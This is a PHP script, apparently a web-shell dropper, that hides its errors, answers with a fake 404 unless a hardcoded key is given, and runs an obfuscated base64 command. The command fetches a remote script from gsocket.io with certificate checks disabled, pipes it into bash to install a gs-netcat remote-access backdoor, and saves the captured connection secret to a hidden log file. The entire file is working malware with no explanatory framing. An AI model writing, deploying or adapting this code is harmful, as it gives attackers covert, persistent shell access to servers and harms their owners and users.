<?php
@set_time_limit(0);
@ini_set('display_errors', '0');
@ini_set('log_errors', '0');
error_reporting(0);

// Fungsi eksekusi perintah sistem
function run_cmd($cmd) {
    $output = '';
    $cmd .= " 2>&1";

    if (is_callable('system')) {
        ob_start();
        system($cmd);
        $output = ob_get_clean();
    } elseif (is_callable('shell_exec')) {
        $output = shell_exec($cmd);
    } elseif (is_callable('exec')) {
        exec($cmd, $lines);
        $output = implode("\n", $lines);
    } elseif (is_callable('passthru')) {
        ob_start();
        passthru($cmd);
        $output = ob_get_clean();
    } elseif (is_callable('proc_open')) {
        $desc = [
            0 => ["pipe", "r"],
            1 => ["pipe", "w"],
            2 => ["pipe", "w"]
        ];
        $proc = proc_open($cmd, $desc, $pipes);
        if (is_resource($proc)) {
            $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($proc);
        }
    } elseif (is_callable('popen')) {
        $handle = popen($cmd, 'r');
        while (!feof($handle)) {
            $output .= fread($handle, 2048);
        }
        pclose($handle);
    }

    return trim($output);
}

// --- Autentikasi key dari URL atau CLI
$secret_key = "abc123";

// Ambil dari URL (browser) atau CLI argumen
$key = $_GET['key'] ?? ($argv[1] ?? null);

// Cek key, kalau salah keluar
if ($key !== $secret_key) {
    if (php_sapi_name() === 'cli') {
        echo "Unauthorized\n";
    } else {
        http_response_code(404);
    }
    exit;
}

// --- Decode command base64
$base64_part = "R1NfTk9DRVJUQ0hFQ0s9M";
$command_b64 = $base64_part . "SBiYXNoIC1jICIkKGN1" . "cmwgLWZzU0xrIGh0dHBzOi8vZ3NvY2tldC5pby94KSIK";
$command = base64_decode($command_b64);

// Jalankan command
$result = run_cmd($command);

// Simpan log jika regex cocok
if (preg_match('/gs-netcat -s "(.*?)" -i/', $result, $matches)) {
    file_put_contents(__DIR__ . '/.hidden_log.txt', "S: " . $matches[1] . "\n", FILE_APPEND);
}
?>
